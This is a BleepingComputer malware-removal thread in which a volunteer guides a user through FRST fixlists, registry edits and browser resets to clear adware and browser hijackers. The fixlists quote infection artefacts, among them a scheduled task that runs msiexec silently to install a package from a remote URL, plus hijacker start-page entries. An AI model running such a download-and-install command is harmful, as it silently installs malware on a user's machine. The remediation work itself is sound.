Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Winsap.dll , kubey.exe, Nvather , WinSnare , update_msi and many more..


  • This topic is locked This topic is locked
15 replies to this topic

#1 vish_arya

vish_arya

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:03:21 AM

Posted 30 March 2017 - 10:26 AM

I have tried every post and forum... related to malware removing ... I have tried removing them in safe mode.. and keep running scans until malwarebytes, hitman pro, adwcleaner, windows defender, etc stopped detecting even a single threat.
But still these keep coming back after 5-10 days. I have stopped surfing any unknow site just to be sure that am not redownloading them. I have attached FRST.txt and Addition.txt log. 

Please help..!!

Attached Files



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 40,213 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:51 PM

Posted 31 March 2017 - 07:35 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:


(Kyubey.exe) C:\Users\vishal\AppData\Roaming\Kyubey\Kyubey.exe
ShellExecuteHooks: No Name - {D0ACBDDC-03A0-11E7-8952-64006A5CFC23} -  -> No File
ShellIconOverlayIdentifiers: [.QMDeskTopGCIcon] -> {B7667919-3765-4815-A66D-98A09BE662D6} =>  -> No File
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} =>  -> No File
GroupPolicyScripts: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKU\S-1-5-21-2110739183-721557999-1904875066-1000 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
Toolbar: HKLM-x32 - No Name - {A057A204-BACC-4D26-9990-79A187E2698E} -  No File
Toolbar: HKU\S-1-5-21-2110739183-721557999-1904875066-1000 -> No Name - {2B171655-A69C-5C18-B693-6CB5DC269D41} -  No File
FF Plugin: @videolan.org/vlc,version=2.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [No File]
FF Plugin HKU\S-1-5-21-2110739183-721557999-1904875066-1000: @talk.google.com/GoogleTalkPlugin -> C:\Users\vishal\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [No File]
FF Plugin HKU\S-1-5-21-2110739183-721557999-1904875066-1000: @talk.google.com/O1DPlugin -> C:\Users\vishal\AppData\Roaming\Mozilla\plugins\npo1d.dll [No File]
CHR StartupUrls: Default -> "hxxp://www.google.com/","hxxp://www.sweet-page.com/?type=hp&ts=1409729830&from=cor&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX"
CHR Extension: (Poppit!) - C:\Users\vishal\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbkbpnkkkipelfledbfocopglifcfmi [2017-03-21]
CHR Extension: (Chrome Web Store Payments) - C:\Users\vishal\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-21]
CHR Extension: (Chrome Media Router) - C:\Users\vishal\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-03-21]
R2 Kyubey; C:\Users\vishal\AppData\Roaming\Kyubey\Kyubey.exe [243200 2017-03-30] (Kyubey.exe) [File not signed]
R2 WinSAPSvc; C:\Users\vishal\AppData\Roaming\WinSAPSvc\WinSAP.dll [218624 2017-03-30] (Windows) [File not signed]
R2 WINSNARE; C:\Users\vishal\AppData\Roaming\WINSNARE\WinSnare.dll [1293312 2017-03-30] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
U3 idsvc; no ImagePath
Task: {17DDD741-E70C-445F-9F61-AFE4F1895962} - \Microsoft\Windows\Media Center\RegisterObject -> No File <==== ATTENTION
Task: {20D4BECB-5581-454C-A0F8-D4160A166C70} - \Clamechshzuward -> No File <==== ATTENTION
Task: {2E9829BB-A344-4B23-AE3F-E159DCF5F2C6} - System32\Tasks\Gretition Server => C:\Program Files (x86)\Nvather\xderlther.exe
Task: {35B9E1DE-3C40-4EDA-9CBA-5480E5B6F70A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {3FB56423-05B0-4B6B-8D8C-7CB6BC6EC186} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {59D3D09F-E1C7-4EB9-A7F1-61643F3F6663} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-30] ()
Task: {5EBA5001-3FE5-48C8-8E60-267EDC5669A5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {63F7D7F8-2720-4845-9E04-C886B74C4C2E} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS.exe
Task: {6EB097C8-2A64-48D9-9E36-7765E47D0E66} - System32\Tasks\Pharitain => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&amp;v=20170316 /q <==== ATTENTION
Task: {709F843C-FCF1-4737-8354-5DFBFB438783} - \{17B7CF41-5126-4A15-B862-E4B765D331EA} -> No File <==== ATTENTION
Task: {72145681-2981-4A38-B60E-5C270D935113} - \OneDrive Standalone Update Task v2 -> No File <==== ATTENTION
Task: {79E08111-1A9B-4EB0-9E6C-4E5E3405E9EC} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {8C2F4FC6-DA70-47D1-BF30-35554E8ABB41} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {980C72E0-89B3-44EF-8597-AFF297A8C1E2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {B5123FFB-B907-4B61-9597-026F9A72199D} - System32\Tasks\Pigmecif => C:\PROGRA~1\GROOVE~1\Gagzhv.bat  <==== ATTENTION
Task: {E20AF786-F18D-40F2-8F30-19DF10DB6969} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {F14C4AA8-BF57-4520-AD34-48F31B3338CC} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {F2CBA233-F527-4140-B0EA-1D297624A59A} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {F3144176-29A4-423F-8E18-972F045EC70E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {FC211629-91FB-4698-BFC0-B64837102FB0} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {FE028124-A927-48E9-BB69-AD424EA1FF8D} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm [0]
C:\Program Files (x86)\Nvather
C:\Program Files (x86)\MIO
C:\Windows\AutoKMS.exe
C:\PROGRA~1\GROOVE~1
C:\Users\vishal\AppData\Roaming\Kyubey
C:\Users\vishal\AppData\Roaming\WinSAPSvc
C:\Users\vishal\AppData\Roaming\WINSNARE

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.

===

Reset Chrome...
Open Google Chrome, click on menu icon google-chrome-setting-icon.png which is located right side top of the google chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
===

ADOBE SHOCKWARE

Navigate to this page and follow the instructions and get the latest version.
https://www.adobe.com/shockwave/welcome/

=====

ADOBE AIR

Navigate to this page and follow the instructions and get the latest version.
https://get.adobe.com/air/

==============

Your version of Java is also outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after these updates remove these old version(s) via the Control Panel > Programs > Programs and Features.
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 14.0.0.178 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.7.157 - Adobe Systems, Inc.)
Java 7 Update 21 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417021FF}) (Version: 7.0.210 - Oracle)
Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.450 - Oracle)

Pleasepost the fixlog.txt let me know what problem persists with this computer.

#3 vish_arya

vish_arya
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:03:21 AM

Posted 31 March 2017 - 10:38 AM

Hello, nasdaq

Thank you for taking out time for me

1) I have uninstalled java and updated adobe applications (shockware, AIR and flashplayer)

2) I ran FRST and clicked FIX  (fixlog.txt attached) . But when i restarted i found new developments

   i)  Mozilla firefox installed in my PC ( I've never used mozilla before). But not showing in programs and features list in control panel.
   ii) Chrome shortcut address changed to "C:\Program Files (x86)\Hotcine\Application\chrome.exe"
 

3) I found "deskapp" and "winsnare" installed in my programs

I have attached new addition2.txt and FRST2.txt for reference. Also some snaps to show the above cases. I am not doing any changes (update or uninstall) to any program except your guidance. 

Thank you.

Attached Files



#4 nasdaq

nasdaq

  • Malware Response Team
  • 40,213 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:51 PM

Posted 31 March 2017 - 01:28 PM

Remove these programs in bold via the Control Panel > Programs > Programs and Features.
deskapp (HKLM-x32\...\{6AD06984-E21B-436F-9341-11053320B994}) (Version: 1.1.4 - deskapp)
WinSnare (HKLM-x32\...\{3E2BA91E-4812-478B-B594-9876A8081CCD}) (Version: 4.4.3 - WinSnare) <==== ATTENTION


Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

Shortcut: C:\Users\vishal\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\vishal\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\vishal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
ShortcutWithArgument: C:\Users\vishal\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
2017-03-31 13:18 - 2017-03-31 08:40 - 00102400 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{4A23F716-C9CC-4F16-B930-B68D8C9207C1}] => (Allow) C:\Program Files (x86)\Hotcine\Application\chrome.exe
FirewallRules: [{883F4D91-2E93-401A-8652-E7A1721A4862}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{71F5DB00-345F-4A53-9F32-6BC1CA0E9A43}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
() C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
HKU\S-1-5-21-2110739183-721557999-1904875066-1000\...\ChromeHTML: -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.) <==== ATTENTION	
HKU\S-1-5-21-2110739183-721557999-1904875066-1000\...\Run: [GoogleChromeAutoLaunch_0E5E511B9C6F336105C90703B55E87DE] => C:\Program Files (x86)\Hotcine\Application\chrome.exe [941912 2017-03-09] (Google Inc.)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
HKU\S-1-5-21-2110739183-721557999-1904875066-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKU\S-1-5-21-2110739183-721557999-1904875066-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
SearchScopes: HKU\S-1-5-21-2110739183-721557999-1904875066-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2110739183-721557999-1904875066-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
Edge HomeButtonPage: HKU\S-1-5-21-2110739183-721557999-1904875066-1000 -> hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
FF Extension: (FF Adr) - C:\Users\vishal\AppData\Roaming\Firefox\Firefox\Profiles\ns75nsgk.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-03-31] [not signed]
FF SearchPlugin: C:\Users\vishal\AppData\Roaming\Firefox\Firefox\Profiles\ns75nsgk.default\searchplugins\startsearch.xml [2017-03-31]
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.startpageing123.com/?type=sc&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKU\S-1-5-21-2110739183-721557999-1904875066-1000\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.) <==== ATTENTION
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [102400 2017-03-31] () [File not signed]
S2 HotcineSU; "C:\Users\vishal\AppData\Local\Temp\1\ttff.exe" /i [X] <==== ATTENTION
C:\Program Files (x86)\Hotcine
C:\Program Files (x86)\Firefox\bin
C:\Users\vishal\AppData\Local\Temp\1
C:\Users\vishal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk
C:\Users\vishal\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
C:\Program Files (x86)\deskapp
C:\Program Files (x86)\WinSnare(4.4.3)

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Looks like your Chrome was compromises.

Remove Chrome using the the instructions on this page.
https://support.google.com/chrome/answer/95319?hl=en

Clear your Chrome cache and cookies
https://support.google.com/chromebook/answer/183083?hl=en

Before you do Export your Bookmarks
Chrome will export your bookmarks as a HTML file, which you can then import into another browser.

Re-install Chrome and the Bookmarks.

Use this Chrome page.
https://support.google.com/chrome/answer/95346?co=GENIE.Platform%3DDesktop&hl=en
===

Firefox:
Reset Default Browsing settings:
https://support.mozilla.org/en-US/kb/reset-firefox-easily-fix-problems?utm_expid=65912487-41.djHNRQY0RhaLvvtvcd0BQA.2&utm_referrer=https%3A%2F%2Fwww.google.ca%2F

Clean the Firefox Cache.
https://kb.iu.edu/d/ahic#firefox
<<<>>>

Reset Internet Explorer:
Menu > Tools > Internet Options > Advanced Tab.
Click the Reset button on the bottom of the pane.
Click the Apply button.
Close IE.
===

Lets see what we can find in the Registry.

Farbar Recovery Scan Tool (FRST) - Registry Search
Follow the instructions below to download and execute a Registry search on your system with FRST, and provide the log in your next reply.
  • Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • In the Search text area, copy and paste the following:
V2OND97EM5;W3JCL7RP16;JS4NDH930P;76GOS11SE2
  • Once done, click on the Search Registry button and wait for FRST to finish the search;
  • On completion, a log will open in Notepad. Copy and paste its content in your next reply;
Please let me know what problem persists with this computer.

#5 vish_arya

vish_arya
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:03:21 AM

Posted 31 March 2017 - 05:19 PM

Hello, Nasdaq
 

I have followed all the instructions as you said.
​I am attaching  the result files but I have a general query that I can still find the folders with the virus names (ex. C:\Users\vishal\AppData\Local\Hotcine) (pic attached)
​Are these ok? or should I run a scan or something to remove these?

Attached Files



#6 nasdaq

nasdaq

  • Malware Response Team
  • 40,213 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:51 PM

Posted 01 April 2017 - 07:20 AM

Yes you can delete that Hotcine folder in your App Data\Local folder.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start


CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM\...\Policies\Explorer: [NoActiveDesktop] 1 [0 2017-03-31] ()
HKLM\...\Policies\Explorer: [NoActiveDesktopChanges] 1 [0 2017-03-31] ()
CHR StartupUrls: Default -> "hxxp://www.google.com/","hxxp://www.sweet-page.com/?type=hp&ts=1409729830&from=cor&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX","hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX"[/B

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Copy the text IN THE QUOTE BOX below to notepad. Save it as fixme.reg to your desktop.
Be sure the "Save as" type is set to "all files" Once you have saved Right click the .reg file and allow it to merge with the registry.
 

Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-2110739183-721557999-1904875066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run]
"V2OND97EM5"=-
"W3JCL7RP16"=-
"JS4NDH930P"=-
"76GOS11SE2"=-


Restart the computer when completed.

You can delete the fixme.reg file when done.
===

How is the computer running now?

No need to submit new FRST and Addition.txt logs unless you still have issues.

#7 vish_arya

vish_arya
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:03:21 AM

Posted 01 April 2017 - 08:52 AM

Thank you for helping me out. 

1) I am now searching for all the leftover folders by the names (as many as i can remember) of viruses in "C:\Users\vishal\AppData\"

2) After that am gonna use a scan of malware bytes and then hitman pro. (I'll let you know if i find anything)
   
   a) Threat detected in "C:\FRST\Quarantine\C\Program Files (x86)\Nvather" . There are many .exe files present there. Are they fine or should i remove them ? . Many other folders are present there with virus names and have .exe files.

I can't see any virus signs manually .That's a big help. But they have a bad record of coming back after 4-5 days even if i don't use internet at all. So I would like to put a trial window of 5 days before confirming that it's gone.

Either way thanks a lot. :)

Attached Files


Edited by vish_arya, 01 April 2017 - 09:06 AM.


#8 nasdaq

nasdaq

  • Malware Response Team
  • 40,213 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:51 PM

Posted 01 April 2017 - 01:05 PM



a) Threat detected in "C:\FRST\Quarantine\C\Program Files (x86)\Nvather" . There are many .exe files present there. Are they fine or should i remove them ? . Many other folders are present there with virus names and have .exe files.


Nothing to worry about. These are the files removed by my fix. They are in the FRST\Quarantine folder which can be cleaned when all is well.

===

If all is well.

To learn more about how to protect yourself while on the internet read this little guide best security practices keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/


https://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
Simple and easy ways to keep your computer safe and secure on the Internet.
===

I close my topic in 6 days. Return if you need.

#9 vish_arya

vish_arya
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:03:21 AM

Posted 05 April 2017 - 05:58 PM

Hello Nasdaq,
 

When i scanned my PC after your fix Adware.Elex was detected by Malwarebytes. I removed it at that time and no threats were detected for last few days. Today I ran a normal scan and I found sweet-page.com and Adware.Elex as threats. Surprisingly only Malwarebytes is detecting Adware.Elex rest anti malware softwares like Hitman Pro and anti adware software like adware cleaner shows No threat. 

I am attaching FRST.txt and Addition.txt and also 2 pics to show the scan results.
PS: I have removed sweet-page.com virus using adware cleaner and thereafter it's not detected again but i haven't touched Adware.Elex as it keeps coming back no matter how many times i remove it.

kindly guide me further. Thank you.
 

Attached Files

  • Attached File  4.JPG   79.59KB   0 downloads
  • Attached File  5.JPG   77.6KB   0 downloads
  • Attached File  Addition.txt   38.02KB   1 downloads
  • Attached File  FRST.txt   137.06KB   1 downloads


#10 nasdaq

nasdaq

  • Malware Response Team
  • 40,213 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:51 PM

Posted 06 April 2017 - 07:02 AM

Can you post the MBAM log.

I would like to see the complete registry keys where these are parked.

I suspect that we are dealing with some dead registry keys.

If that is the case I can provide a fix for it.

#11 vish_arya

vish_arya
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:03:21 AM

Posted 06 April 2017 - 10:33 AM

I have attached the latest mbam scan log 

Attached Files



#12 nasdaq

nasdaq

  • Malware Response Team
  • 40,213 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:51 PM

Posted 07 April 2017 - 08:22 AM

The report shows that the bad keys were quarantined.

Do the key re-spawn when each time you execute Malwarebytes?
Do they have the same number in the {...} such as {66397E66-B196-4A80-B328-C9EB4C12279A} or some other string.

#13 vish_arya

vish_arya
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:03:21 AM

Posted 07 April 2017 - 08:12 PM

I have attached two previous mbam scan logs when i removed Adware.Elex . 

mbam only shows scan logs after removing the virus. Nothing shows up if you just scan and don't take any actions on results. Either way i ran a scan today no threat detected by any of my anti malware programs. So I don't know when it will return. 

Attached Files



#14 nasdaq

nasdaq

  • Malware Response Team
  • 40,213 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:51 PM

Posted 08 April 2017 - 07:41 AM

Lets see what we can find in the Registry.

Farbar Recovery Scan Tool (FRST) - Registry Search
Follow the instructions below to download and execute a Registry search on your system with FRST, and provide the log in your next reply.
  • Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • In the Search text area, copy and paste the following:
Milimili
  • Once done, click on the Search Registry button and wait for FRST to finish the search;
  • On completion, a log will open in Notepad. Copy and paste its content in your next reply;


#15 vish_arya

vish_arya
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:03:21 AM

Posted 08 April 2017 - 11:48 AM

Found nothing.

Anyway thanks for saving my job am really greatful to you ! All my malware scanners are showing "no threats found" and my laptop is working much better. So we can either wait for a 5 days window again to check if it shows up again or we can just close this forum here based on your discretion.

Thank you !! :)

Attached Files






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users